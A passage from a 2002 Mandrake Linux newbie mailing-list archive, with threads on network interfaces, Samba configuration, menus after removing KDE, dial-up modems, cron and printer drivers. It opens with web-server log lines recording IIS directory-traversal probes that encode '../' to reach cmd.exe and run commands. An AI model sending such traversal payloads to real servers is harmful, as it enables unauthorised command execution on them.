/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"

__
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Newbie and Confused! :)

2002-07-28 Thread RichardA

The first rule of Mandrake club.

shane, Friday 26 July 2002 00:54:
> On Thursday 25 July 2002 4:10 pm, et did speak unto the huddled masses,
>
> saying:
> > On Wednesday 24 July 2002 09:20 pm, you wrote:
> > > I have mandrake 8.2 and I am attempting to install KDE 3.0x and Update
> > > the Kernel
> >
> > NEVER "update" the Kernel.
>
> what he means is _NEVER_!!!  ;-)
>
> but do try http://www.mandrakeuser.org/docs/install/kupgrade.html



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] interfaces not coming up

2002-07-28 Thread Duke Glover

Hello Mandrake gods,

Here the problem.  I am attempting to install Mandrake 8.2 on an HP Kayak
XM600.  Everything works fine except for one crucial piece.  I am unable to
get the interfaces to come up (eth0 and eth1).  eth0 is an 3Com 3C905C TX
and eth1 is a Linksys LNE100 TX.  I have used both of these cards in other
systems so I know they work.  I have installed Mandrake 7.1 on other systems
with these same models of cards and never had a problem.  The cards are
detected correctly and I set them to use DHCP.  The only log entries that I
have found that pertain to the problem simply say that eth0, and/or eth1,
failed to receive a valid response from a dhcp server.  However, I can plug
another system into the same interface I am using on my router for the
system I am having problems with and I can get a dhcp address no problem.  I
am at wits end with this system.  I have tried Mandrake 7.1 and 8.2.  All to
no avail.  I cannot figure out what I am doing wrong.  Also, I have set
dhcpcd to run at boot.

/pulling hair out now

Any ideas/suggestions greatly appreciated.

Thanks,

Duke




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] Need Help configuring Mozilla/*.pdf

2002-07-28 Thread Erylon Hines

I have a site that I must get *.pdf forms from, but xpdf persists in cutting 
off one side so that I cannot print the form correctly.  I discovered that 
the Linux version of Acrobat does not do this, but Mozilla persists in 
opening all *.pdf files with xpdf, even though I have set acroread to open 
that file extension.  Can someone tell me what I need to do to change the 
helper application to Acrobat from xpdf?  Or, as an alternative, what do I 
need to do to correctly show and print forms with xpdf?

I didn't have any trouble at all getting Opera to use acroread, but I can't 
figure out how to get Mozilla to do it.

thanks in advance,

e.



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Menus damaged when KDE removed

2002-07-28 Thread civileme

Mad Scientist wrote:

>On Sunday 28 July 2002 08:24 am, Dennis Myers wrote:
>
>I installed Gnome and removed KDE, leaving alone my various other
>windows managers (Blackbox, IceWM, etc.). Fine, but now the start
>menus in my various windows managers are missing many items. All
>items are visible in menudrake, but they do not appear in the start
>menus. I've tried editing menudrake and rebooting, but no change in
>the start menus. What should I do to make my menus reflect what
>menudrake shows?
>
>
>I have a very similar (perhaps the same) problem. It first started after I 
>installed WINE from source. If I choose menu style "All applications" in 
>MenuDrake, I get nothing in the K menu even though all menus are present in 
>MenuDrake. If I choose "What to do?" menu style, then those ones are there. 
>But checking on "Add link to All applications menu" doesn't add any such 
>link. It seems the applications menu is somehow messed up. Finally, if I 
>choose "Original menu", then I *do* get the original menus. Unfortunately, 
>these are unrelated to which apps I have installed.
>
>Hopefully this additional info causes a light to go on for somebody :-)
>
>
>
>
>Want to buy your Pack or Services from MandrakeSoft? 
>Go to http://www.mandrakestore.com
>
If you look at /usr/lib/menu you will see all sorts of files that have 
to do with menu.  In those files is a needs clause.

If it needs kde then it disappears when kde is removed.  Those files are 
written directly into the mdk rpm spec files and are cleaned when things 
are removed.

If you remove KDE surely you did not expect anything depending on KDE to 
stick around.  Konqueror does have an embedded version, true, but that 
version is not included with the distro.

Now menu files can be in the system menu or in the user menu (which are 
specific to each user) and they can appear for a specific desktop 
 'Needs kde'  'needs gnome'  'needs blackbox'  are sometimes clauses

There is considerable room for expansion in the menu structure.  The 
"what to do?" is an example.  It is also easily possible to add another 
clause to each menu item which defines a level so that a user could rate 
his own level and if for example choosing newbie, see only the simplest 
of apps.  This is easily done.

What you will notice about our menus is that, to the extent possible, 
they stay the same across desktops.  KDE and GNOME-specific items that 
just need the widget set for each of those do propagate across desktops, 
and are on some of them submenued as "KDE apps" or "GNOME Apps".

In other words the system did what it was told which wasn't what you 
expected.

Civileme
 





Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Recording Net-Radio Broadcasts (Chpt 2)

2002-07-28 Thread John Richard Smith

Graham Watkins wrote:

> And here's the secondpart.
>
>  Original Message 
> Subject: [newbie] Recording Net-Radio Broadcasts (Chpt 2)
> Date: 25 Jun 2002 03:39:17 -0400
> From: Lyvim Xaphir <[EMAIL PROTECTED]>
> Reply-To: [EMAIL PROTECTED]
> To: NewbieMandrake-List <[EMAIL PROTECTED]>
>
>
>
> In the previous email to this one I demonstrated how you could bring the
> Sox sound utility up to speed with Ogg Vorbis encoding. Because of some
> very competent and excellent help I now know we need to amend the sox
> installation steps.
> Formerly it looked like this:
> __
> ./configure make
> After that we need to edit the Makefile that we just made. Do
> vi Makefile __
> Now it looks like:
>
> ./configure --prefix=/usr --mandir=/usr/share/man --libdir=/usr/lib \ 
>--sysconfdir=/etc
> make make install
> With no editing of the Makefile, and everything else remains the same. 
> Much better approach; thanks Tom Lyons!  However, as dfox pointed out,
> sox likes to put uncompressed man page files out there, so after Tom
> Lyon's ./configure addition above we still need to do the following:
> cd /usr/share/man/man1
> (deleting the old originals)
> rm -f sox.1.bz2 rm -f play.1.bz2 rm -f soxexam.1.bz2
> (compressing the newer and more up to date manpages)
> bzip2 sox.1 bzip2 play.1 bzip2 soxexam.1
> There are symlinks in the man1 directory that point to the compressed
> man page filenames; we need not destroy or recreate those because they
> will become valid as we replace their targets with the proper files.
> (after the bzip2 process.)
> Now we will put Sox to work as we get Realplayer installed and
> functional.  The Sox recompile has been and is the most complicated part
> of this (unless you are hunting Windows Media streams, but that's
> another time), so don't run yet.  The rest is pretty straightforward
> stuff.
> Realplayer can be a little tricky to get ahold of if you haven't done it
> before.  There are two ways I can think of for everyone here and neither
> one of them involve going to the Realplayer site for a download.  I've
> heard fuzziness about the binaries on the Realplayer site, and haven't
> experienced them myself, but have listened intently to others.
> The number one way to get Realplayer is to be a member of the Mandrake
> Club.  Like me, for instance.  ;D  In that case you can get it from the
> following link:
> http://www.mandrakeclub.com/modules.php?name=Downloads&d_op=search&query=realplayer 
>
>
>
> This gets you RealPlayer-8.0-3mdk.i586.rpm; which is a newer and slicker
> rpm.  Works better too, IMO.
> If you are NOT a Mandrake Club member, you can get the rpm from this
> link:
> ftp://speakeasy.rpmfind.net/linux/freshrpms/misc/RealPlayer-8.0-1.i386.rpm 
>
>
>
> After you download the rpm from one of these, you go to the directory
> you put it in ( ~/tmp, perhaps) and issue the following:
> rpm -ivh RealPlayer-8.0-blah.rpm
> You also need to review at this point that your soundcard is fully
> functional, and also that you have Kmix installed.  Kmix is a graphical
> util that controls all available aspects of your soundcard as it sees
> them; and usually it sees the most.  If you don't have it pull up
> rpmdrake and do a search on your installation cd's for it.
> Now pull up Kmix from your menu or from an Eterm or terminal prompt. 
> You will notice a bunch of sliders and alot of green lights, with one
> red light lit up across the bottom.  The greens represent all sources
> that are sending to or have access to /dev/dsp. Turn them ALL OFF except
> for anything labeled with a RED right triangle across the top, and the
> master volume and PCM sliders. Of the Red right triangles, there are
> only two that seem to affect recording on my system: Ogain and Recmon. 
> These need to have green lights.  If you have these two sliders, leave
> them green and turn the other red triangles off. This is important.
> The controls vary from soundcard to soundcard, depending on it's
> features.  You may need to experiment; but this section gives you the
> basic blueprint.
> Your soundcard may be different in the next step too, so again you may
> have to experiment.  Notice that the Master and PCM sliders are almost
> to the top; they work just fine right there.  Move your Gain sliders
> almost to the bottom; the same degree that the Master/PCM sliders are
> from the top.  Know what I mean here?  This is the proper degree of
> adjustment for my system; I assume here that it will work for you as
> well.
> Now let's deal with the red lights across the bottom. This represents
> your recording source; and There Will Only Be One.  Yep, just like
> Highlander.  Your One needs to be Master, so make sure that one is lit
> up under the Master slider, and all the other ones are dark.  What am I
> doing and why, you ask?  Well, noise is a real problem.  By carefully
> targeting what channels are active 

[newbie] from adsl to dial up with isa pnp modem ...

2002-07-28 Thread Rainer

hello,

i'm switching back to dial up using an isa pnp 3com/usr 56k modem. i had a
hell of time (3 months, the 5th linux geek i asked finally got it working!)
getting it to work on red hat 7.2. so any advice re mandrake 8.2 would be
much appreciated!!! thanks




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] from adsl to dial up with isa pnp modem ...

2002-07-28 Thread Damian G

On Sun, 28 Jul 2002 13:42:13 -0400
"Rainer" <[EMAIL PROTECTED]> wrote:

> hello,
> 
> i'm switching back to dial up using an isa pnp 3com/usr 56k modem. i had a
> hell of time (3 months, the 5th linux geek i asked finally got it working!)
> getting it to work on red hat 7.2. so any advice re mandrake 8.2 would be
> much appreciated!!! thanks
> 

well, if your modem is a hardware one, then there should be no problem.
imply start the kppp program ( if you don't have it installed try "urpmi kppp")

the configuration is much like windows' dialup dinnection dialog. you will
be prompted for your usarname and password, and below it you will see a 
"connect" button, alongside "setup" and "cancel". click setup. 
in account setup you can make a new one, entering username, password, phone
number and dns servers.. no need to touch anything else. it's quite simple.

in the 'modem' tab, you can find a 'query modem' button to see if your 
modem was detected successfully. maybe you wanna try that one first.

HTH

Damian


-- 
Who is General Failure, and why is he reading my disk?



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: Re[2]: [newbie] chmod and chown on vfat

2002-07-28 Thread Damian G

 
> Sorry, don't have it here at hand, but you just need to append quiet
> at the end of the options part, eg.__
> /dev/hda1 /mnt/win_c vfat noauto,exec,users,quiet 0 0
> 
> --
> HTH
> Roman

cool, thanks a lot! ;o)

Damian

-- 
Who is General Failure, and why is he reading my disk?



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] cron/anacron job

2002-07-28 Thread Mark Curry

Hi,

I have written a script which I want cron to run and anacron.

Although I know the script works okay from a bash prompt Anacron tells
me:

run-parts: component /var/spool/cron/mark is not an executable plain
file'

I created the job using crontab -e, which installs crontab after editing
and sets the file permissions as -rw--- automatically.

Should I make the file executable ? - and if so why does crontab -e
change the permissions ?

Help appreciated.

Mark



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] CUPS driver for Star Gemini-10X

2002-07-28 Thread dfox

> I am trying to get my venerable Star Gemini-10X working under LM 8.1 and 
> CUPS but cannot find an appropriate driver. The Gemini-10X is a 9 pin 

You have one of those too ;). I got mine early on in 1984 (back then
I was using a TRS890). The printer doesn't work anymore, but IIRC, it's
pretty close to 9 pin Epsons of the era. The epson 'emulation' 
(basically it's an MX-80 clone) is very close to Epson, but there are
subtle differences when using graphics -- specifically the dot widths
are spaced differently with Epson as compared to the 10X. This led me
to briefly contribute printer definition files when I was working at
Symantec back in 1986.

The printer expired long before I was introduced to Linux, but I 
think yuo will have some cussess witht he Epson 9 pin drivers: 
specifically 'eps9high' in GhostScript. I recommend starting 
small, perhaps try printing test pages with Ghostscript using that
driver. If it works correctly, you might try CUPS with the
appropriate printer driver. You may get discernable vertical spaces
in the output using the Epson 9 pin drivers though - that's the 
effect of the spacing differences in the Gemini 10X.



> Warren




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Menus damaged when KDE removed

2002-07-28 Thread Mad Scientist

On Sunday 28 July 2002 08:24 am, Dennis Myers wrote:
> > > > I installed Gnome and removed KDE, leaving alone my various other
> > > > windows managers (Blackbox, IceWM, etc.). Fine, but now the start
> > > > menus in my various windows managers are missing many items. All
> > > > items are visible in menudrake, but they do not appear in the start
> > > > menus. I've tried editing menudrake and rebooting, but no change in
> > > > the start menus. What should I do to make my menus reflect what
> > > > menudrake shows?

I have a very similar (perhaps the same) problem. It first started after I 
installed WINE from source. If I choose menu style "All applications" in 
MenuDrake, I get nothing in the K menu even though all menus are present in 
MenuDrake. If I choose "What to do?" menu style, then those ones are there. 
But checking on "Add link to All applications menu" doesn't add any such 
link. It seems the applications menu is somehow messed up. Finally, if I 
choose "Original menu", then I *do* get the original menus. Unfortunately, 
these are unrelated to which apps I have installed.

Hopefully this additional info causes a light to go on for somebody :-)

-- 
Madness is soil in which creativity grows

 - Chris Bielek



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] upgradeing to 9.0 beta

2002-07-28 Thread Tom Brinkman

On Sunday July 28 2002 02:29 am, Alastair Scott wrote:
> On Sunday 28 Jul 2002 1:45 am, Tom Brinkman wrote:
> >I admire your persistence to save the home an' hearth ;)  First,
> > IMO, current 9.0 KDE3.0.2 is much better than any of the available
> > 'KDE3.x' upgrades for 8.x.  As is Gnome2, so why try'n save the old
> > 8.x shi.. err I mean stuff ?
>
> The 'stuff' that's moved from old to new is just .rc files and
> similar (kmailrc and so on); there's many hours of configuration in
> those. Certainly not any of the desktop icon themes, for example!
>
> Alastair

In early June I saved a copy of 8.2's /home/tom to a storage 
partition and did a fresh install of 8.3/9.0 (the 6/6/02 'alpha' 
release).  Immediately after the install, I copied the 8.2 /home backup 
into 9.0, which instantly broke the whole system. I sort'a knew it 
would ;) KDE wouldn't even start. Re-installed 9.0, and the first thing 
I did was copy in from backup, my /Mail dir. Then Kmail had all my 
saved, old to current emails and folders. In trying to copy in 8.2 
kmailrc files (I saved the existing 9.0 rc files first), kmail broke. 
So I reinstated the 9.0 kmail rc files, and reconfigured the newer 
kmail version. 

   It took a few minutes, not "many hours".  I had a similar experience 
with KNode, several others. All in all, copying in what I could from my 
/home backup, and reconfiguring everything I normally use, including 
installing a few apps that don't come with Mandrake took little more 
than an hour, maybe two at most.  Granted I've had to do all this many 
times in the past with Mandrake version upgrades, so I pretty well know 
in advance, what will/won't work, what can be saved/what shouldn't be.
A lot of this knowledge comes from lurking on the cooker mailing list.

   Since June, I've kept 9.0 current using 'urpmi --auto-select' on 
cooker mirrors.  Occaisionally, some package upgrades will overrite a 
old config file. Sometimes configuration is moved, and the old config 
is obsolete (eg, ~/X11/fs/config for Gnome2 apps). The developers try'n 
hold this to a bare minimum, but sometimes it's neccessary. Which is 
just part of why a saved 8.2 /home won't work with 9.0. Other major 
reasons are the vast changes in libraries and gcc. So for example, 
stuff like flash, (Sun) java, and other 3rd party closed source stuff 
is mostly worthless. At least until they get around to upgrading their 
apps to the new gcc/libs. The vendors will have to, Mandrake can't do 
it without their source, or for legal reasons. Many cookers have 
reported some success with getting nvidia's src.rpms and other 3rd 
party stuff to rebuild on 9.0 using IGNORE_GCC_MISMATCH=1 on src.rpms.  
I haven't bothered.

   In the past week, cooker has moved from gcc 3.1.1 to 3.2, requiring 
that most all packages in 9.0 be completely rebuilt. Practically the 
whole distro. I can't upgrade with just a dialup, so I'm stuck with 
roughly 9.0b1 till I get 9.0beta2 CD's. When they come out, I already 
know a complete wipe and fresh install will be wise, if not just plain 
neccessary. So, much less 8.2 isn't compatible with 9.0, 9.0b1 isn't 
even compatible with 9.0b2. While an upgrade might be possible, it 
_would_ probly take "many hours" and lot'sa fixin. Easier an simpler 
just to wipe, re-install, and do a little reconfiguring, save from 
backup whatever's possible, re-do what isn't.

   I never could figure out any worthwhile purpose for desktop icons 
other than to clutter things up, any OS. The menu works just find for 
starting stuff, sometimes better.  First thing always I do after a 
fresh install is to delete all /Desktop icons except for Trash, which I 
move so that the icon no longer appears.  Takes a minute ;>  YMMV
-- 
Tom Brinkman  Corpus Christi, Texas



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Menus damaged when KDE removed

2002-07-28 Thread Dennis Myers

On Saturday 27 July 2002 09:40 pm, you wrote:
> El sáb, 27-07-2002 a las 19:57, Dennis Myers escribió:
> > On Saturday 27 July 2002 08:32 pm, you wrote:
> > > I installed Gnome and removed KDE, leaving alone my various other
> > > windows managers (Blackbox, IceWM, etc.). Fine, but now the start menus
> > > in my various windows managers are missing many items. All items are
> > > visible in menudrake, but they do not appear in the start menus. I've
> > > tried editing menudrake and rebooting, but no change in the start
> > > menus. What should I do to make my menus reflect what menudrake shows?
> > >
> > > Warren
> >
> > Warren, I believe that some of the menus were probably KDE specific and
> > since you got rid of KDE they are not really there anymore, just a guess.
> > So I would try "update-menus -v" from a su console and see if that does
> > not fix up your menus and menudrake. HTH
>
> No, quite the opposite, I'm afraid. Everything has been lost from my
> menus except the freshly installed Gnome apps. The Mandrake Control
> Center is gone, the Software Manager is gone, the window manager
> specific apps are gone (for example, the configuration tools for
> Blackbox), and so forth. These apps have not been uninstalled and can
> still be launched from a terminal; they're just not on any menu any
> more. update-menu produces no change. Any other ideas?
>
> Warren
Sorry, my limited expertise comes up empty on further ideas.
-- 
Dennis M. linux user #180842



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



RE: [newbie] Hows this for an idea for Mandrake.

2002-07-28 Thread frankie

a list of the things you can save pops up, and you tick the box's of those
things that you want to keep..

the basic stuff would be:

security.
postfix.
apache.
kde & gnome
related apps.
kmail mozilla etc etc..

just the usuauls...

and  any settings that are the defaults would not need to be saved..

Then we could all reinstall every 6 months and have the new install
configured just as the old one was with no effort at all..


wonderful  :-)

now, how do we convince mandrake that its fantastic to have the latest
version, but its a pain to have to reconfigure everything every 6 months to
get it..


rgds

Frank

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of Roger Sherman
Sent: Sunday, July 28, 2002 9:42 PM
To: [EMAIL PROTECTED]
Subject: Re: [newbie] Hows this for an idea for Mandrake.


On Sun, 28 Jul 2002, frankie wrote:

>
> Hi guys,
>
> We know that its always better to install rather then upgrade,
>
> But I get really sick of reinstalling endlessly to get the latest stuff..
> and I was thinking about that.
>
> Wouldn't it be a fantastic thing if Mandrake created an "Export system &
> user Settings" drake tool.???
>
>
> and a drake import settings.   this tool would go and collect settings
from
> running services, users and security, and you could save the config to a
> floppy, wipe the drive, reinstall and insert the floppy and run the import
> drake, which sets it all up for you again.. (that way you get to have the
> latest config files, rather then keeping files like smb.conf and putting
it
> in the next version..)
>
>
> what do you guys thing? is that a good idea or what?

I like it! Especially if you had some control over what it looked for, say
like a gui panel where you could enter in the services that you use, etc.



>
>
>
> rgds
>
> Frank
>
>
>
>




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: Re[2]: [newbie] MD compatible monitors

2002-07-28 Thread Scott

On Sunday 28 July 2002 06:59 am, you wrote:
> >> >I'm looking at a Samsung 96 BDF 19" screen
> >> >Res 1600x 1200
> >> >refresh 65Hz
> >> >dp .20mm
> >> >for $190
> >> >
> >> >Anyone know anything about it?
> >>
> >> Also, its not listed on the Samsung USA site or the rest of the site
> >> even under obsolete models!
> >
> > Sorry, actually its a Samitron, which is a division of samsung I
> > guess.  It's in a samsung box.
>
> That'd be Samtron (not Samitron), just in case someone wants to look
> it up.


Thanks all.
BTW that is Samtron and if anyone is interested I saw it at the local Sam's 
Club Store.



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Re: USB Interface failed

2002-07-28 Thread Metamorphysical

It's a Tyan Motherboard but I don't know what the chipset is. and I'm
running a AMD Thunderbird processor.
What I don't understand is that it worked for the first time I booted after
spending 3 days getting my Gforce4 AGP to work because I couldn't get into
the GUI interface.
The next time I booted it stopped working.  ??
- Original Message -
From: "civileme" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, July 27, 2002 3:38 PM
Subject: [newbie] Re: USB Interface failed


> Well, it is quite likely that you have a Tyan Thunder with athlon MP
> processors or any of several models of Gateway with an AMD Irongate
Chipset.
>
> Something about those ohci USB-interfaces is different from the defined
> ohci, and it simply doesn't work with the standard kernel driver.
>  Naturally they work fine with their own custom window drivers.
>
> I cannot quote your original message since the html in it manages to
> translate out a beautiful Chinese character set here.
>
> Civileme
>
>
>
>






> Want to buy your Pack or Services from MandrakeSoft?
> Go to http://www.mandrakestore.com
>




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Hows this for an idea for Mandrake.

2002-07-28 Thread Roger Sherman

On Sun, 28 Jul 2002, frankie wrote:

> 
> Hi guys,
> 
> We know that its always better to install rather then upgrade,
> 
> But I get really sick of reinstalling endlessly to get the latest stuff..
> and I was thinking about that.
> 
> Wouldn't it be a fantastic thing if Mandrake created an "Export system &
> user Settings" drake tool.???
> 
> 
> and a drake import settings.   this tool would go and collect settings from
> running services, users and security, and you could save the config to a
> floppy, wipe the drive, reinstall and insert the floppy and run the import
> drake, which sets it all up for you again.. (that way you get to have the
> latest config files, rather then keeping files like smb.conf and putting it
> in the next version..)
> 
> 
> what do you guys thing? is that a good idea or what?

I like it! Especially if you had some control over what it looked for, say 
like a gui panel where you could enter in the services that you use, etc.



> 
> 
> 
> rgds
> 
> Frank
> 
> 
> 
> 


Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com


Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] LAN problems

2002-07-28 Thread magnet

Hi, having some probs with my network...

I have one laptop running ME and 6 mandrake machines running samba.
The laptop has no problem read/writing files from any location to anywhere
else. It also has icons on it's desktop to double-click to open a share.
Also these shares are mapped as different drives. ie: linux1/home -> F:\
linux2/home -> G:\ etc...
What I was trying to do was set up the RC5 clients on the linux2-linux6
machines to use a shared buffer on linux1 machine, and that's when the prob
hit me...

How do I specify on a command line on, say linux2 box, the full path to a
directory on the linux1 box?

regards magnet


Registered Linux user 281659
Registered machines:
163839 - Mdk 8.2
163840 - Mdk 8.2
163841 - Mdk 8.2
163842 - Mdk 8.2
163843 - Mdk 8.2
163844 - Mdk 8.0

Home network: 6 x AMD Athlon 1.2 GHz all running Mandrake.

My home is over-run with penguins that like a warm environment!






Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] grep search

2002-07-28 Thread Moshe Kaminsky

Hi,

You may use the find command. find allows you to go through a directory
tree and perform some tests and actions on it. For example, in your case
you want something like

  find / -path /mnt -prune -o -type f -exec grep "my exp" {} \;

Here, the / means start in /, the '-path /mnt -prune' means if the path
is of the form /mnt, don't go into it, the '-o' is a logical or, '-type f'
means only regular files, and the -exec says what command to execute
(the '{}' is replaced by the file name). find has many other option, all
of which you can read about in man find. Note in particular the -mount
option, which might be a simpler way to do what you want

HTH
Moshe

* Anne Wilson <[EMAIL PROTECTED]> [020724 20:59]:
> Is there a way of using grep to search for a word in all directories except 
> those under /mnt ?
> 
> Anne
> 

> Want to buy your Pack or Services from MandrakeSoft? 
> Go to http://www.mandrakestore.com




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Network Problems Re-Stated

2002-07-28 Thread Derek Jennings

On Sunday 28 Jul 2002 10:54 am, Anne Wilson wrote:
> On Saturday 27 Jul 2002 1:51 pm, you wrote:
> > On Saturday 27 Jul 2002 1:28 pm, C.Anne Wilson wrote:
> > > Unfortunately the improvement was *very* shortlived.  I downloaded a
> > > file for
> > > use elsewhere, started to copy it to FD, it crashed and was
> > > unrecoverable.
> > >
> > > New start, then.   I've re-installed, and have things almost back to
> > > where they were.
> > >
> > > Win98 clients can see my shared directories.
> > >
> > > [homes] is not working properly:
> > >If I enable File & print Sharing for Windows Networks
> > >  Clients can see each other
> > >  and the server
> > >  and a folder marked \\username
> > >
> > >  Opening this folder shows an apparently empty folder which
> > > cannot be written
> > > to.
> > >
> > >If I remove F & P Sharing etc..
> > >  Clients can see each other
> > >  and the server
> > >  and a folder marked \\username
> > >
> > >  Attempting to open this folder fails, citing unknown error.
> > >
> > > log.nmbd has this message:
> > >
> > > [2002/07/27 13:20:42, 0]
> > > nmbd/nmbd_browsesync.c:find_domain_master_name_query_fail(359)
> > >find_domain_master_name_query_fail:
> > >Unable to find the Domain Master Browser name LYDGATE.NET<1b> for
> > > the workgroup LYDGATE.NET.
> > >Unable to sync browse lists in this workgroup.
> > >
> > > I presume that I have missed something that is making this fail.  Any
> > > pointers, please?
> > >
> > > I'm now certain that the slowdowns I have experienced are connected
> > > with the
> > > network problems.  When I re-installed everything was a slick as you
> > > could want, but the moment I wrote the smb.conf and hosts files I was
> > > back to 20 sec. open times.
> > >
> > > Annene
> >
> > Can we see your smb.conf file please Anne.
> >
> > Also how are you connecting the network physically?  Gateway, firewall
> > etc.
> >
> > Thanks
> >
> > derek
>
> Connection - Cat45 cabling through hub, no firewall yet, this machine is
> gateway for Win98 m/cs internet connection sharing.
>
> smb.conf:
> [global]
>   smb passwd file = /etc/samba/smbpasswd
>   printing = cups
>   dns proxy = no
>   encrypt passwords = yes
>   socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
>   wins support = true
>   printcap name = lpstat
>   max log size = 50
>   security = user
>   server string = Samba Server %v
>   workgroup = lydgate.net
>   local master = yes
>   netbios name = anne-linux
>   log file = /var/log/samba/log.%m
>   load printers = yes
>   os level = 33
>
> [homes]
>   writable = yes
>   valid users = anne,Micky,Andy,Gillian,Guest
>   comment = Home Directories
>   browseable = no
> * public = yes
> * guest ok = yes
>
> [printers]
> comment = All Printers
> path = /var/spool/samba
> browseable = no
> # to allow user 'guest account' to print.
> guest ok = yes
> writable = no
> printable = yes
> create mode = 0700
> # =
> # print command: see above for details.
> # =
> print command = lpr-cups -P %p -o raw %s -r
> #   using client side printer drivers.
> ;   print command = lpr-cups -P %p %s # using cups own drivers (use generic
> # PostScript on clients).
> # The following two commands are the samba defaults for printing=cups
> # change them only if you need different options:
> ;   lpq command = lpq -P %p
> ;   lprm command = cancel %p-%j
>
> [print$]
> path = /var/lib/samba/printers
> browseable = yes
> read only = yes
> write list = @adm root
>
> [Anne_Public]
> path = /mnt/win_d2/Public
> browsable = yes
> writable = yes
> public = yes
> create mask = 0775
> #   guest ok = yes
>
>
> [Zips]
> path = /mnt/win_c/Zips & Downloads
> browsable = yes
> writable = yes
> public = yes
> user = Andy,Gillian,Micky,Nigel
> create mask = 0775
> #   guest ok = yes
>
> [KAV_Bases]
> path = /mnt/win_c/Program Files/Common Files/AVP Shared Files/Bases
> writable = no
> browsable = yes
> public = yes
> create mask = 0775
> #   guest ok = yes
>
> [MP3]
> path = /home/anne/Desktop/Mp3
> comment = /home/anne/Desktop/Mp3
> public = yes
> #   guest ok = yes
> writable = yes
>
> The two starred lines were added yesterday (by Webmin) when I tried to
> check if they were not connecting as themselves - a silly idea, really,
> because I had already disabled guest access to the public directories, and
> they can see them OK.
>
> Anne


Anne

Looking at your smb.conf it looks like you are going to be broadcasting Samba 
over both of your interfaces.  To your local network, and to t

Re[2]: [newbie] chmod and chown on vfat

2002-07-28 Thread Roman Korcek

Hey,

>> When copying to vfat partitions the filemanagers often try to copy the
>> attributes, too. I solved this problem by appending quiet as an option
>> in the relevant fstab entries.
>> I wonder, is there a better way?

> uhmm.. can i see that line in your fstab?? ;o)
> for a long time i thought this had no solution at all!

Sorry, don't have it here at hand, but you just need to append quiet
at the end of the options part, eg.__
/dev/hda1 /mnt/win_c vfat noauto,exec,users,quiet 0 0

--
HTH
Roman




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Hows this for an idea for Mandrake.

2002-07-28 Thread Alastair Scott

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Sunday 28 Jul 2002 10:15 am, frankie wrote:

> We know that its always better to install rather then upgrade,
>
> But I get really sick of reinstalling endlessly to get the latest stuff..
> and I was thinking about that.
>
> Wouldn't it be a fantastic thing if Mandrake created an "Export system &
> user Settings" drake tool.???
>
>
> and a drake import settings.   this tool would go and collect settings from
> running services, users and security, and you could save the config to a
> floppy, wipe the drive, reinstall and insert the floppy and run the import
> drake, which sets it all up for you again.. (that way you get to have the
> latest config files, rather then keeping files like smb.conf and putting it
> in the next version..)
>
> what do you guys thing? is that a good idea or what?

I wrote a shell script which copies various files to a directory, then 
.tar.bz2.gpg's it, then copies it to a remote server. This does an excellent 
job without effort.

The system configuration (services, security, configuration files) is fine and 
worth doing, but package configuration is another matter. The problem with 
Linux is choice: you can't assume people will use certain packages. I'm sure 
most use kmail or Evolution in some sense, but the percentage is definitely 
not as high as that of Windows users who use Outlook Express (from the 
contents of my mailbox, easily 95 per cent; there are progressively fewer and 
fewer people using Eudora, for one).

drakbackup looks interesting though :)

Alastair
- -- 
Alastair Scott (London, United Kingdom)
